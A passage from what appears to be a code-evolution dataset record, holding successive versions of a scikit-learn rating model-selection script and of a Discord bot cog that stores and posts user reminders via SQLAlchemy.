= pd.read_csv('data/output_train.csv', delimiter=',')['rating']\naggregated = pd.read_csv('data/agregated_data_28-11-2016_01h50.csv',\n delimiter=',')\nms = ModelSelection(users.values, movies.values, aggregated.values, train.\n values, output)\nprint(ms.optimizeParametersKNeighborsClassifier(5, range(1, 5, 1)))\n",
"step-4": "import numpy as np\nimport pandas as pd\nimport datetime\nimport time\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import KFold\n\n\ndef make_submission(y_predict, user_id_test, movie_id_test, name=None, date\n =True):\n n_elements = len(y_predict)\n if name is None:\n name = 'submission'\n if date:\n name = name + '_{}'.format(time.strftime('%d-%m-%Y_%Hh%M'))\n with open(name + '.csv', 'w') as f:\n f.write('\"USER_ID_MOVIE_ID\",\"PREDICTED_RATING\"\\n')\n for i in range(n_elements):\n if np.isnan(y_predict[i]):\n raise ValueError('NaN detected!')\n line = '{:0.0f},{:0.0f},{}\\n'.format(user_id_test[i],\n movie_id_test[i], y_predict[i])\n f.write(line)\n print('Submission file successfully written!')\n\n\nclass ModelSelection:\n\n def __init__(self, user_data, movie_data, aggregated_data, train_data,\n output_train):\n self.train = train_data\n self.users = user_data\n self.aggregated = aggregated_data\n self.movies = movie_data\n self.output_train = output_train\n\n def optimizeParametersDecisionTreeClassifier(self, nb_fold, max_depth_range\n ):\n kf = KFold(n_splits=nb_fold)\n depth_n_errors = np.zeros((max_depth_range.__len__(), 2))\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][0] = depth\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for depth in max_depth_range:\n dt = DecisionTreeClassifier(max_depth=depth)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n depth_n_errors[i][1] += -scores.mean()\n i += 1\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][1] /= nb_fold\n i += 1\n best_depth = 0\n best_error = 5\n for depth, error in depth_n_errors:\n if error < best_error:\n 
best_error = error\n best_depth = depth\n dt = DecisionTreeClassifier(max_depth=best_depth)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_depth, final_error.mean()]\n\n def optimizeParametersKNeighborsClassifier(self, nb_fold, k_range):\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for k in k_range:\n dt = KNeighborsClassifier(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n best_k = 0\n best_error = 5\n for k, error in k_n_errors:\n if error < best_error:\n best_error = error\n best_k = k\n dt = KNeighborsClassifier(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_k, final_error.mean()]\n\n def optimizeParametersKNeighborsRegressor(self, nb_fold, k_range):\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for k in k_range:\n dt = KNeighborsRegressor(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n best_k = 0\n best_error = 5\n for k, error in k_n_errors:\n if error < best_error:\n best_error = error\n best_k = k\n dt = KNeighborsRegressor(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, 
self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_k, final_error.mean()]\n\n\nusers = pd.read_csv('data/user_data_normalized_28-11-2016_01h32.csv',\n delimiter=',')\nmovies = pd.read_csv('data/movie_data_normalized.csv', delimiter=',')\ntrain = pd.read_csv('data/data_train.csv', delimiter=',')\noutput = pd.read_csv('data/output_train.csv', delimiter=',')['rating']\naggregated = pd.read_csv('data/agregated_data_28-11-2016_01h50.csv',\n delimiter=',')\nms = ModelSelection(users.values, movies.values, aggregated.values, train.\n values, output)\nprint(ms.optimizeParametersKNeighborsClassifier(5, range(1, 5, 1)))\n",
"step-5": "import numpy as np\nimport pandas as pd\nimport datetime\nimport time\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import KFold\n\ndef make_submission(y_predict, user_id_test, movie_id_test, name=None, date=True):\n n_elements = len(y_predict)\n\n if name is None:\n name = 'submission'\n if date:\n name = name + '_{}'.format(time.strftime('%d-%m-%Y_%Hh%M'))\n\n with open(name + \".csv\", 'w') as f:\n f.write('\"USER_ID_MOVIE_ID\",\"PREDICTED_RATING\"\\n')\n for i in range(n_elements):\n if np.isnan(y_predict[i]):\n raise ValueError('NaN detected!')\n line = '{:0.0f},{:0.0f},{}\\n'.format(user_id_test[i],movie_id_test[i],y_predict[i])\n f.write(line)\n print(\"Submission file successfully written!\")\n\nclass ModelSelection:\n def __init__(self, user_data, movie_data, aggregated_data, train_data, output_train):\n self.train = train_data\n self.users = user_data\n self.aggregated = aggregated_data\n self.movies = movie_data\n self.output_train = output_train\n\n def optimizeParametersDecisionTreeClassifier(self, nb_fold, max_depth_range):\n\n kf = KFold(n_splits=nb_fold)\n depth_n_errors = np.zeros((max_depth_range.__len__(), 2))\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][0] = depth\n i += 1\n #First round of cv\n for train_index, test_index in kf.split(self.aggregated):\n #Second round of cv\n i = 0\n for depth in max_depth_range:\n dt = DecisionTreeClassifier(max_depth=depth)\n scores = cross_val_score(dt, self.aggregated[train_index], self.output_train[train_index], cv=nb_fold, scoring='neg_mean_squared_error')\n depth_n_errors[i][1] += -scores.mean()\n i += 1\n\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][1] /= nb_fold\n i += 1\n\n best_depth = 0\n best_error = 5\n #Take the best model and cross 
validate it on the whole data\n for depth, error in depth_n_errors:\n if(error < best_error):\n best_error = error\n best_depth = depth\n\n #Recompute the error for this model on the whole data set\n dt = DecisionTreeClassifier(max_depth=best_depth)\n final_error = -cross_val_score(dt, self.aggregated, self.output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n\n return[best_depth, final_error.mean()]\n\n\n def optimizeParametersKNeighborsClassifier(self, nb_fold, k_range):\n\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n #First round of cv\n for train_index, test_index in kf.split(self.aggregated):\n #Second round of cv\n i = 0\n for k in k_range:\n dt = KNeighborsClassifier(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index], self.output_train[train_index], cv=nb_fold, scoring='neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n\n best_k = 0\n best_error = 5\n #Take the best model and cross validate it on the whole data\n for k, error in k_n_errors:\n if(error < best_error):\n best_error = error\n best_k = k\n\n #Recompute the error for this model on the whole data set\n dt = KNeighborsClassifier(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n\n return[best_k, final_error.mean()]\n\n def optimizeParametersKNeighborsRegressor(self, nb_fold, k_range):\n\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n #First round of cv\n for train_index, test_index in kf.split(self.aggregated):\n #Second round of cv\n i = 0\n for k in k_range:\n dt = KNeighborsRegressor(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index], self.output_train[train_index], cv=nb_fold, 
scoring='neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n\n best_k = 0\n best_error = 5\n #Take the best model and cross validate it on the whole data\n for k, error in k_n_errors:\n if(error < best_error):\n best_error = error\n best_k = k\n\n #Recompute the error for this model on the whole data set\n dt = KNeighborsRegressor(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n\n return[best_k, final_error.mean()]\n\n\n\n\nusers = pd.read_csv(\"data/user_data_normalized_28-11-2016_01h32.csv\", delimiter=\",\")\nmovies = pd.read_csv(\"data/movie_data_normalized.csv\", delimiter=\",\")\ntrain = pd.read_csv(\"data/data_train.csv\", delimiter=\",\")\noutput = pd.read_csv(\"data/output_train.csv\", delimiter=\",\")[\"rating\"]\naggregated = pd.read_csv(\"data/agregated_data_28-11-2016_01h50.csv\", delimiter=\",\")\nms = ModelSelection(users.values, movies.values, aggregated.values, train.values, output)\n#print(ms.optimizeParametersDecisionTreeClassifier(5, range(2,3,1)))\nprint(ms.optimizeParametersKNeighborsClassifier(5, range(1,5,1)))\n#print(ms.optimizeParametersKNeighborsClassifier(5, range(5,10,1)))",
"step-ids": [
5,
7,
8,
9,
10
]
}
|
[
5,
7,
8,
9,
10
] |
<|reserved_special_token_0|>
class Reminders(commands.Cog):
    """Cog providing the ``reminder`` command group.

    Constructing the cog schedules the ``reminder_check`` background task on
    the bot's event loop, which periodically plays back due reminders.
    """

    def __init__(self, bot: Bot):
        self.bot = bot
        # Kick off the polling loop that delivers due reminders.
        self.bot.loop.create_task(reminder_check(self.bot))

    @commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)
    async def reminder(self, ctx: Context):
        """Top-level ``reminder`` group; replies when no subcommand matched."""
        if not ctx.invoked_subcommand:
            await ctx.send('Subcommand not found.')

    @reminder.command(help=
        'Add a reminder, format "yyyy-mm-dd hh:mm" or "mm-dd hh:mm" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'
        )
    async def add(self, ctx: Context, trigger_time: DateTimeConverter, *,
        reminder_content: str):
        """Validate *trigger_time* and persist a new Reminder row.

        Rejects unparseable or past times; otherwise stores the reminder and
        confirms, rolling back the DB session on failure.
        """
        now = datetime.now()
        if not trigger_time:
            # DateTimeConverter yields a falsy value on parse failure.
            await ctx.send('Incorrect time format, please see help text.')
        elif trigger_time < now:
            await ctx.send('That time is in the past.')
        else:
            display_name = get_name_string(ctx.message)
            # Messages bridged from IRC have no database user; use a fixed
            # placeholder id and remember the IRC nick instead.
            if user_is_irc_bot(ctx):
                author_id = 1
                irc_n = display_name
            else:
                author_id = get_database_user(ctx.author).id
                irc_n = None
            trig_at = trigger_time
            trig = False
            playback_ch_id = ctx.message.channel.id
            new_reminder = Reminder(user_id=author_id, reminder_content=
                reminder_content, trigger_at=trig_at, triggered=trig,
                playback_channel_id=playback_ch_id, irc_name=irc_n)
            db_session.add(new_reminder)
            try:
                db_session.commit()
                await ctx.send(
                    f"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')})."
                    )
            except (ScalarListException, SQLAlchemyError) as e:
                db_session.rollback()
                logging.exception(e)
                # BUG FIX: dropped the stray f-prefix from a placeholder-free
                # f-string (same message text, no interpolation needed).
                await ctx.send('Something went wrong')
def setup(bot: Bot):
    """Extension entry point: attach the Reminders cog to *bot*."""
    cog = Reminders(bot)
    bot.add_cog(cog)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
async def reminder_check(bot):
    """Background polling loop that delivers due reminders.

    Runs forever: every CONFIG.REMINDER_SEARCH_INTERVAL seconds it queries
    for untriggered reminders whose trigger time has passed, plays each one
    back into its original channel, and marks it triggered.
    """
    await bot.wait_until_ready()
    while not bot.is_closed():
        now = datetime.now()
        # "== False" is deliberate: SQLAlchemy compiles it into a SQL
        # comparison, unlike "is False" / "not ...".
        reminders = db_session.query(Reminder).filter(Reminder.trigger_at <=
            now, Reminder.triggered == False).all()
        for r in reminders:
            if r.irc_name:
                # Reminder came from the IRC bridge; address by stored nick.
                display_name = r.irc_name
            else:
                author_uid = r.user.user_uid
                display_name = f'<@{author_uid}>'
            channel = bot.get_channel(r.playback_channel_id)
            # NOTE(review): get_channel returns None for deleted channels;
            # channel.send would then raise and kill this task — confirm.
            message = f'Reminding {display_name}: ' + r.reminder_content
            await channel.send(message)
            r.triggered = True
            db_session.commit()
        await asyncio.sleep(CONFIG.REMINDER_SEARCH_INTERVAL)
class Reminders(commands.Cog):
    """Cog providing the ``reminder`` command group.

    Constructing the cog schedules the ``reminder_check`` background task on
    the bot's event loop, which periodically plays back due reminders.
    """

    def __init__(self, bot: Bot):
        self.bot = bot
        # Kick off the polling loop that delivers due reminders.
        self.bot.loop.create_task(reminder_check(self.bot))

    @commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)
    async def reminder(self, ctx: Context):
        """Top-level ``reminder`` group; replies when no subcommand matched."""
        if not ctx.invoked_subcommand:
            await ctx.send('Subcommand not found.')

    @reminder.command(help=
        'Add a reminder, format "yyyy-mm-dd hh:mm" or "mm-dd hh:mm" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'
        )
    async def add(self, ctx: Context, trigger_time: DateTimeConverter, *,
        reminder_content: str):
        """Validate *trigger_time* and persist a new Reminder row.

        Rejects unparseable or past times; otherwise stores the reminder and
        confirms, rolling back the DB session on failure.
        """
        now = datetime.now()
        if not trigger_time:
            # DateTimeConverter yields a falsy value on parse failure.
            await ctx.send('Incorrect time format, please see help text.')
        elif trigger_time < now:
            await ctx.send('That time is in the past.')
        else:
            display_name = get_name_string(ctx.message)
            # Messages bridged from IRC have no database user; use a fixed
            # placeholder id and remember the IRC nick instead.
            if user_is_irc_bot(ctx):
                author_id = 1
                irc_n = display_name
            else:
                author_id = get_database_user(ctx.author).id
                irc_n = None
            trig_at = trigger_time
            trig = False
            playback_ch_id = ctx.message.channel.id
            new_reminder = Reminder(user_id=author_id, reminder_content=
                reminder_content, trigger_at=trig_at, triggered=trig,
                playback_channel_id=playback_ch_id, irc_name=irc_n)
            db_session.add(new_reminder)
            try:
                db_session.commit()
                await ctx.send(
                    f"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')})."
                    )
            except (ScalarListException, SQLAlchemyError) as e:
                db_session.rollback()
                logging.exception(e)
                # BUG FIX: dropped the stray f-prefix from a placeholder-free
                # f-string (same message text, no interpolation needed).
                await ctx.send('Something went wrong')
def setup(bot: Bot):
    """Extension entry point: attach the Reminders cog to *bot*."""
    cog = Reminders(bot)
    bot.add_cog(cog)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
# User-facing help strings for the "reminder" command group (see Reminders cog).
LONG_HELP_TEXT = """
Add reminders for yourself or remove the last one you added.
"""
SHORT_HELP_TEXT = 'Add or remove reminders.'
async def reminder_check(bot):
    """Background polling loop that delivers due reminders.

    Runs forever: every CONFIG.REMINDER_SEARCH_INTERVAL seconds it queries
    for untriggered reminders whose trigger time has passed, plays each one
    back into its original channel, and marks it triggered.
    """
    await bot.wait_until_ready()
    while not bot.is_closed():
        now = datetime.now()
        # "== False" is deliberate: SQLAlchemy compiles it into a SQL
        # comparison, unlike "is False" / "not ...".
        reminders = db_session.query(Reminder).filter(Reminder.trigger_at <=
            now, Reminder.triggered == False).all()
        for r in reminders:
            if r.irc_name:
                # Reminder came from the IRC bridge; address by stored nick.
                display_name = r.irc_name
            else:
                author_uid = r.user.user_uid
                display_name = f'<@{author_uid}>'
            channel = bot.get_channel(r.playback_channel_id)
            # NOTE(review): get_channel returns None for deleted channels;
            # channel.send would then raise and kill this task — confirm.
            message = f'Reminding {display_name}: ' + r.reminder_content
            await channel.send(message)
            r.triggered = True
            db_session.commit()
        await asyncio.sleep(CONFIG.REMINDER_SEARCH_INTERVAL)
class Reminders(commands.Cog):
    """Cog providing the ``reminder`` command group.

    Constructing the cog schedules the ``reminder_check`` background task on
    the bot's event loop, which periodically plays back due reminders.
    """

    def __init__(self, bot: Bot):
        self.bot = bot
        # Kick off the polling loop that delivers due reminders.
        self.bot.loop.create_task(reminder_check(self.bot))

    @commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)
    async def reminder(self, ctx: Context):
        """Top-level ``reminder`` group; replies when no subcommand matched."""
        if not ctx.invoked_subcommand:
            await ctx.send('Subcommand not found.')

    @reminder.command(help=
        'Add a reminder, format "yyyy-mm-dd hh:mm" or "mm-dd hh:mm" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'
        )
    async def add(self, ctx: Context, trigger_time: DateTimeConverter, *,
        reminder_content: str):
        """Validate *trigger_time* and persist a new Reminder row.

        Rejects unparseable or past times; otherwise stores the reminder and
        confirms, rolling back the DB session on failure.
        """
        now = datetime.now()
        if not trigger_time:
            # DateTimeConverter yields a falsy value on parse failure.
            await ctx.send('Incorrect time format, please see help text.')
        elif trigger_time < now:
            await ctx.send('That time is in the past.')
        else:
            display_name = get_name_string(ctx.message)
            # Messages bridged from IRC have no database user; use a fixed
            # placeholder id and remember the IRC nick instead.
            if user_is_irc_bot(ctx):
                author_id = 1
                irc_n = display_name
            else:
                author_id = get_database_user(ctx.author).id
                irc_n = None
            trig_at = trigger_time
            trig = False
            playback_ch_id = ctx.message.channel.id
            new_reminder = Reminder(user_id=author_id, reminder_content=
                reminder_content, trigger_at=trig_at, triggered=trig,
                playback_channel_id=playback_ch_id, irc_name=irc_n)
            db_session.add(new_reminder)
            try:
                db_session.commit()
                await ctx.send(
                    f"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')})."
                    )
            except (ScalarListException, SQLAlchemyError) as e:
                db_session.rollback()
                logging.exception(e)
                # BUG FIX: dropped the stray f-prefix from a placeholder-free
                # f-string (same message text, no interpolation needed).
                await ctx.send('Something went wrong')
def setup(bot: Bot):
    """Extension entry point: attach the Reminders cog to *bot*."""
    cog = Reminders(bot)
    bot.add_cog(cog)
<|reserved_special_token_1|>
import asyncio
import logging
from datetime import datetime
from discord.ext import commands
from discord.ext.commands import Bot, Context
from humanize import precisedelta
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy_utils import ScalarListException
from config import CONFIG
from models import Reminder, db_session
from utils import DateTimeConverter, get_database_user, get_database_user_from_id, get_name_string, user_is_irc_bot
# User-facing help strings for the "reminder" command group (see Reminders cog).
LONG_HELP_TEXT = """
Add reminders for yourself or remove the last one you added.
"""
SHORT_HELP_TEXT = 'Add or remove reminders.'
async def reminder_check(bot):
    """Background polling loop that delivers due reminders.

    Runs forever: every CONFIG.REMINDER_SEARCH_INTERVAL seconds it queries
    for untriggered reminders whose trigger time has passed, plays each one
    back into its original channel, and marks it triggered.
    """
    await bot.wait_until_ready()
    while not bot.is_closed():
        now = datetime.now()
        # "== False" is deliberate: SQLAlchemy compiles it into a SQL
        # comparison, unlike "is False" / "not ...".
        reminders = db_session.query(Reminder).filter(Reminder.trigger_at <=
            now, Reminder.triggered == False).all()
        for r in reminders:
            if r.irc_name:
                # Reminder came from the IRC bridge; address by stored nick.
                display_name = r.irc_name
            else:
                author_uid = r.user.user_uid
                display_name = f'<@{author_uid}>'
            channel = bot.get_channel(r.playback_channel_id)
            # NOTE(review): get_channel returns None for deleted channels;
            # channel.send would then raise and kill this task — confirm.
            message = f'Reminding {display_name}: ' + r.reminder_content
            await channel.send(message)
            r.triggered = True
            db_session.commit()
        await asyncio.sleep(CONFIG.REMINDER_SEARCH_INTERVAL)
class Reminders(commands.Cog):
    """Cog providing the ``reminder`` command group.

    Constructing the cog schedules the ``reminder_check`` background task on
    the bot's event loop, which periodically plays back due reminders.
    """

    def __init__(self, bot: Bot):
        self.bot = bot
        # Kick off the polling loop that delivers due reminders.
        self.bot.loop.create_task(reminder_check(self.bot))

    @commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)
    async def reminder(self, ctx: Context):
        """Top-level ``reminder`` group; replies when no subcommand matched."""
        if not ctx.invoked_subcommand:
            await ctx.send('Subcommand not found.')

    @reminder.command(help=
        'Add a reminder, format "yyyy-mm-dd hh:mm" or "mm-dd hh:mm" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'
        )
    async def add(self, ctx: Context, trigger_time: DateTimeConverter, *,
        reminder_content: str):
        """Validate *trigger_time* and persist a new Reminder row.

        Rejects unparseable or past times; otherwise stores the reminder and
        confirms, rolling back the DB session on failure.
        """
        now = datetime.now()
        if not trigger_time:
            # DateTimeConverter yields a falsy value on parse failure.
            await ctx.send('Incorrect time format, please see help text.')
        elif trigger_time < now:
            await ctx.send('That time is in the past.')
        else:
            display_name = get_name_string(ctx.message)
            # Messages bridged from IRC have no database user; use a fixed
            # placeholder id and remember the IRC nick instead.
            if user_is_irc_bot(ctx):
                author_id = 1
                irc_n = display_name
            else:
                author_id = get_database_user(ctx.author).id
                irc_n = None
            trig_at = trigger_time
            trig = False
            playback_ch_id = ctx.message.channel.id
            new_reminder = Reminder(user_id=author_id, reminder_content=
                reminder_content, trigger_at=trig_at, triggered=trig,
                playback_channel_id=playback_ch_id, irc_name=irc_n)
            db_session.add(new_reminder)
            try:
                db_session.commit()
                await ctx.send(
                    f"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')})."
                    )
            except (ScalarListException, SQLAlchemyError) as e:
                db_session.rollback()
                logging.exception(e)
                # BUG FIX: dropped the stray f-prefix from a placeholder-free
                # f-string (same message text, no interpolation needed).
                await ctx.send('Something went wrong')
def setup(bot: Bot):
    """Extension entry point: attach the Reminders cog to *bot*."""
    cog = Reminders(bot)
    bot.add_cog(cog)
<|reserved_special_token_1|>
import asyncio
import logging
from datetime import datetime
from discord.ext import commands
from discord.ext.commands import Bot, Context
from humanize import precisedelta
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy_utils import ScalarListException
from config import CONFIG
from models import Reminder, db_session
from utils import (
DateTimeConverter,
get_database_user,
get_database_user_from_id,
get_name_string,
user_is_irc_bot,
)
# User-facing help strings for the "reminder" command group (see Reminders cog).
LONG_HELP_TEXT = """
Add reminders for yourself or remove the last one you added.
"""
SHORT_HELP_TEXT = """Add or remove reminders."""
async def reminder_check(bot):
    """Background polling loop that delivers due reminders.

    Runs forever: every CONFIG.REMINDER_SEARCH_INTERVAL seconds it queries
    for untriggered reminders whose trigger time has passed, plays each one
    back into its original channel, and marks it triggered.
    """
    await bot.wait_until_ready()
    while not bot.is_closed():
        now = datetime.now()
        # "== False" is deliberate: SQLAlchemy compiles it into a SQL
        # comparison (hence the noqa), unlike "is False" / "not ...".
        reminders = (
            db_session.query(Reminder)
            .filter(Reminder.trigger_at <= now, Reminder.triggered == False)  # noqa 712
            .all()
        )
        for r in reminders:
            if r.irc_name:
                # Reminder came from the IRC bridge; address by stored nick.
                display_name = r.irc_name
            else:
                author_uid = r.user.user_uid
                display_name = f"<@{author_uid}>"
            channel = bot.get_channel(r.playback_channel_id)
            # NOTE(review): get_channel returns None for deleted channels;
            # channel.send would then raise and kill this task — confirm.
            message = f"Reminding {display_name}: " + r.reminder_content
            await channel.send(message)
            r.triggered = True
            db_session.commit()
        await asyncio.sleep(CONFIG.REMINDER_SEARCH_INTERVAL)
class Reminders(commands.Cog):
    """Cog providing the ``reminder`` command group.

    Constructing the cog schedules the ``reminder_check`` background task on
    the bot's event loop, which periodically plays back due reminders.
    """

    def __init__(self, bot: Bot):
        self.bot = bot
        # Kick off the polling loop that delivers due reminders.
        self.bot.loop.create_task(reminder_check(self.bot))

    @commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)
    async def reminder(self, ctx: Context):
        """Top-level ``reminder`` group; replies when no subcommand matched."""
        if not ctx.invoked_subcommand:
            await ctx.send("Subcommand not found.")

    @reminder.command(
        help='Add a reminder, format "yyyy-mm-dd hh:mm" or "mm-dd hh:mm" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'
    )
    async def add(
        self, ctx: Context, trigger_time: DateTimeConverter, *, reminder_content: str
    ):
        """Validate *trigger_time* and persist a new Reminder row.

        Rejects unparseable or past times; otherwise stores the reminder and
        confirms, rolling back the DB session on failure.
        """
        now = datetime.now()
        if not trigger_time:
            # DateTimeConverter yields a falsy value on parse failure.
            await ctx.send("Incorrect time format, please see help text.")
        elif trigger_time < now:
            await ctx.send("That time is in the past.")
        else:
            # HURRAY the time is valid and not in the past, add the reminder
            display_name = get_name_string(ctx.message)
            # set the id to a placeholder if the author was the bridge bot,
            # since we won't be using it anyway
            # if ctx.message.clean_content.startswith("**<"): <---- FOR TESTING
            if user_is_irc_bot(ctx):
                author_id = 1
                irc_n = display_name
            else:
                author_id = get_database_user(ctx.author).id
                irc_n = None
            trig_at = trigger_time
            trig = False
            playback_ch_id = ctx.message.channel.id
            new_reminder = Reminder(
                user_id=author_id,
                reminder_content=reminder_content,
                trigger_at=trig_at,
                triggered=trig,
                playback_channel_id=playback_ch_id,
                irc_name=irc_n,
            )
            db_session.add(new_reminder)
            try:
                db_session.commit()
                await ctx.send(
                    f"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')})."
                )
            except (ScalarListException, SQLAlchemyError) as e:
                db_session.rollback()
                logging.exception(e)
                # BUG FIX: dropped the stray f-prefix from a placeholder-free
                # f-string (same message text, no interpolation needed).
                await ctx.send("Something went wrong")
def setup(bot: Bot):
    """Hook discord.py calls when this extension is loaded: register the cog."""
    reminders_cog = Reminders(bot)
    bot.add_cog(reminders_cog)
|
flexible
|
{
"blob_id": "0f54853901a26b66fe35106593ded6c92785b8db",
"index": 2682,
"step-1": "<mask token>\n\n\nclass Reminders(commands.Cog):\n\n def __init__(self, bot: Bot):\n self.bot = bot\n self.bot.loop.create_task(reminder_check(self.bot))\n\n @commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)\n async def reminder(self, ctx: Context):\n if not ctx.invoked_subcommand:\n await ctx.send('Subcommand not found.')\n\n @reminder.command(help=\n 'Add a reminder, format \"yyyy-mm-dd hh:mm\" or \"mm-dd hh:mm\" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'\n )\n async def add(self, ctx: Context, trigger_time: DateTimeConverter, *,\n reminder_content: str):\n now = datetime.now()\n if not trigger_time:\n await ctx.send('Incorrect time format, please see help text.')\n elif trigger_time < now:\n await ctx.send('That time is in the past.')\n else:\n display_name = get_name_string(ctx.message)\n if user_is_irc_bot(ctx):\n author_id = 1\n irc_n = display_name\n else:\n author_id = get_database_user(ctx.author).id\n irc_n = None\n trig_at = trigger_time\n trig = False\n playback_ch_id = ctx.message.channel.id\n new_reminder = Reminder(user_id=author_id, reminder_content=\n reminder_content, trigger_at=trig_at, triggered=trig,\n playback_channel_id=playback_ch_id, irc_name=irc_n)\n db_session.add(new_reminder)\n try:\n db_session.commit()\n await ctx.send(\n f\"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')}).\"\n )\n except (ScalarListException, SQLAlchemyError) as e:\n db_session.rollback()\n logging.exception(e)\n await ctx.send(f'Something went wrong')\n\n\ndef setup(bot: Bot):\n bot.add_cog(Reminders(bot))\n",
"step-2": "<mask token>\n\n\nasync def reminder_check(bot):\n await bot.wait_until_ready()\n while not bot.is_closed():\n now = datetime.now()\n reminders = db_session.query(Reminder).filter(Reminder.trigger_at <=\n now, Reminder.triggered == False).all()\n for r in reminders:\n if r.irc_name:\n display_name = r.irc_name\n else:\n author_uid = r.user.user_uid\n display_name = f'<@{author_uid}>'\n channel = bot.get_channel(r.playback_channel_id)\n message = f'Reminding {display_name}: ' + r.reminder_content\n await channel.send(message)\n r.triggered = True\n db_session.commit()\n await asyncio.sleep(CONFIG.REMINDER_SEARCH_INTERVAL)\n\n\nclass Reminders(commands.Cog):\n\n def __init__(self, bot: Bot):\n self.bot = bot\n self.bot.loop.create_task(reminder_check(self.bot))\n\n @commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)\n async def reminder(self, ctx: Context):\n if not ctx.invoked_subcommand:\n await ctx.send('Subcommand not found.')\n\n @reminder.command(help=\n 'Add a reminder, format \"yyyy-mm-dd hh:mm\" or \"mm-dd hh:mm\" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'\n )\n async def add(self, ctx: Context, trigger_time: DateTimeConverter, *,\n reminder_content: str):\n now = datetime.now()\n if not trigger_time:\n await ctx.send('Incorrect time format, please see help text.')\n elif trigger_time < 